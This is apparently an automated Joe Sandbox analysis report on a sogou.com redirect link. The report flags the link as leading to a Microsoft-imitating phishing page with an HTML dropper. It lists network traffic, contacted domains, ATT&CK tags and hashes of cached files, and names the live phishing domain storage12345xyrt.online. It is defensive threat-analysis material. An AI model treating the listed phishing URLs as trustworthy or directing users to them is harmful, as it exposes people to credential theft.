Edit tour

Windows Analysis Report
https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.

Overview

General Information

Sample URL:	https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.
Analysis ID:	1300527

Detection

HtmlDropper, HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Html Dropper

Yara detected HtmlPhish10

Phishing site detected (based on image similarity)

HTML page contains hidden URLs or javascript code

Invalid 'sign-in options' or 'sign-up' link found

HTML body contains low number of good links

HTML title does not match URL

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw. MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)

chrome.exe (PID: 3272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1780,i,12972442292183590786,1599695243166672078,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
4.5.pages.csv	JoeSecurity_HtmlDropper_3	Yara detected Html Dropper	Joe Security
4.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary
• Data Obfuscation

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish10

Source: Yara match

File source: 4.5.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://storage12345xyrt.online/

HTTP Parser: Base64 decoded: https://storage12345xyrt.online/

Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b

HTTP Parser: Invalid link: get a new Microsoft account

Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b

HTTP Parser: Number of links: 0

Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b

HTTP Parser: Title: 9c58e583f16dc74804636e73193bdfb964ef6a5cae4e9 does not match URL

Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b

HTTP Parser: No <meta name="author".. found

Source: https://storage12345xyrt.online/	HTTP Parser: No favicon
Source: https://storage12345xyrt.online/	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/13lf7/0x4AAAAAAADnPIDROrmt1Wwj/light/normal	HTTP Parser: No favicon
Source: https://storage12345xyrt.online/?__cf_chl_tk=fLyG6m4Jbq2cmHYL14LAUzPLgXY1ZzbyxzaquoJ7a3Q-1693411923-0-gaNycGzNDOU	HTTP Parser: No favicon
Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b	HTTP Parser: No favicon

Source: https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b

HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Source: unknown

DNS traffic detected: queries for: www.sogou.com

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: classification engine

Classification label: mal60.phis.troj.win@30/63@12/190

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1780,i,12972442292183590786,1599695243166672078,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1780,i,12972442292183590786,1599695243166672078,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\GoogleUpdater

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Data Obfuscation

Yara detected Html Dropper

Source: Yara match

File source: 4.5.pages.csv, type: HTML

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	2 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
cs1100.wpc.omegacdn.net	152.199.23.37	true	false		unknown
accounts.google.com	142.250.186.141	true	false		high
quantumsavvy.com	167.114.42.73	true	false		unknown
cdnjs.cloudflare.com	104.17.25.14	true	false		high
challenges.cloudflare.com	104.17.3.184	true	false		high
www.google.com	216.58.206.36	true	false		high
clients.l.google.com	142.250.186.78	true	false		high
www.sogou.com	118.191.216.42	true	false		high
storage12345xyrt.online	104.21.42.134	true	false		unknown
clients2.google.com	unknown	unknown	false		high
www.quantumsavvy.com	unknown	unknown	false		unknown
aadcdn.msftauth.net	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/13lf7/0x4AAAAAAADnPIDROrmt1Wwj/light/normal	false		high
https://storage12345xyrt.online/?__cf_chl_tk=fLyG6m4Jbq2cmHYL14LAUzPLgXY1ZzbyxzaquoJ7a3Q-1693411923-0-gaNycGzNDOU	false		unknown
https://storage12345xyrt.online/	false		unknown
https://storage12345xyrt.online/ecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50aLOGecdf4bd379a15f49895f647f17c0a24c64ef6a5cae50b	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.78	clients.l.google.com	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
34.104.35.123	unknown	United States		15169	GOOGLEUS	false
142.250.186.36	unknown	United States		15169	GOOGLEUS	false
142.250.186.141	accounts.google.com	United States		15169	GOOGLEUS	false
142.250.186.163	unknown	United States		15169	GOOGLEUS	false
172.217.18.3	unknown	United States		15169	GOOGLEUS	false
104.21.42.134	storage12345xyrt.online	United States		13335	CLOUDFLARENETUS	false
118.191.216.42	www.sogou.com	China		59045	SUNHONGSGuangzhounavigationinformationtechnologycoLT	false
216.58.206.36	www.google.com	United States		15169	GOOGLEUS	false
142.250.185.202	unknown	United States		15169	GOOGLEUS	false
104.17.3.184	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
142.250.186.106	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.195	unknown	United States		15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
152.199.23.37	cs1100.wpc.omegacdn.net	United States		15133	EDGECASTUS	false
167.114.42.73	quantumsavvy.com	Canada		16276	OVHFR	false
104.17.25.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1300527
Start date and time:	2023-08-30 18:11:22 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.troj.win@30/63@12/190

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 34.104.35.123, 142.250.185.202, 172.217.18.3, 142.250.186.106, 142.250.186.74, 172.217.18.10, 142.250.185.234, 142.250.186.170, 216.58.212.170, 142.250.185.138, 142.250.185.170, 142.250.186.138, 142.250.186.42, 142.250.181.234, 172.217.16.202, 142.250.184.202, 142.250.184.234, 172.217.16.138
Excluded domains from analysis (whitelisted): fonts.googleapis.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, login.live.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://www.sogou.com/link?url=hedJjaC291NJxlEe_shO0bwLrYqt-fRFAPJ2PFtiHCw.

Created / dropped Files

Chrome Cache Entry: 155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/o/b35ab557a7c6e8b2a42dccced4eca83764ef6a6264687
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 157

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (50758)
Category:	downloaded
Size (bytes):	51039
Entropy (8bit):	5.247253437401007
Encrypted:	false
SSDEEP:
MD5:	67176C242E1BDC20603C878DEE836DF3
SHA1:	27A71B00383D61EF3C489326B3564D698FC1227C
SHA-256:	56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
SHA-512:	9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
Malicious:	false
Reputation:	low
URL:	https://storage12345xyrt.online/boot/b35ab557a7c6e8b2a42dccced4eca83764ef6a5e6f3d7
Preview:	/!. Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum

Chrome Cache Entry: 158

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 99, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.035372245524405
Encrypted:	false
SSDEEP:
MD5:	0EE6851CF3F96C0F038B477183405B76
SHA1:	0829267590C979C9A55A35B4D74A43E25FDB99C1
SHA-256:	D8232C8FA740B89A9F1BC67F159190FB0BCFC44C9FE9988C5B2FF082CD95C470
SHA-512:	AF6E4CC6ABE8B5E13A9E5ED7D6B5F6E9246016E3FFEF787B8D1823287EEE84F869AB2EE642902D7EF478C12B378D20B460237EEB4B8AC33075B90FA09D2A765E
Malicious:	false
Reputation:	low
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/7fee502fff3d9293/1693411925182/Yr9db-EidhlvdiX
Preview:	.PNG........IHDR...@...c......3......IDAT.....$.....IEND.B`.

Chrome Cache Entry: 159

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	21186
Entropy (8bit):	5.443356477522194
Encrypted:	false
SSDEEP:
MD5:	380F2F20BB735CB8051873E6BE014EB9
SHA1:	F2F529A1CBA19A43D3DD57ABD8ED4BBA09451A08
SHA-256:	A021E5EF7022A556C759CCA4E248F10383D65A1CD4DF600DAE57EA37CA481073
SHA-512:	27B39C6C7DAF20454888FA47E28673CBDE406AA8E60A2E2CE420A020C7F33CBA21EB058924BBB3B91AFC51CF832C2B08C4ABA055DAA6D969153FBA83149A27EA
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v12/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7SUc.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v12/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7SUc.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v12/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7SUc.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swa

Chrome Cache Entry: 160

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (29684)
Category:	downloaded
Size (bytes):	29685
Entropy (8bit):	5.354214476338882
Encrypted:	false
SSDEEP:
MD5:	321C4F06DDAD5749830573A903803DB5
SHA1:	A3564508F8FBCB4E97E6AF2C96BC09DED76B273C
SHA-256:	92CEFD873FEDA547496B569EC49CC16EA82C1C28959C46BC8B096B57AFE04BE7
SHA-512:	64AD2FEA8670DBE7F11B740E0EFBCD05571A63B16F8CFAD07D54DB75D9626B44EB2EE77663B03ED458C58F687BC3FEE6E99F762D419FA8423A68454FBE9C09F5
Malicious:	false
Reputation:	low
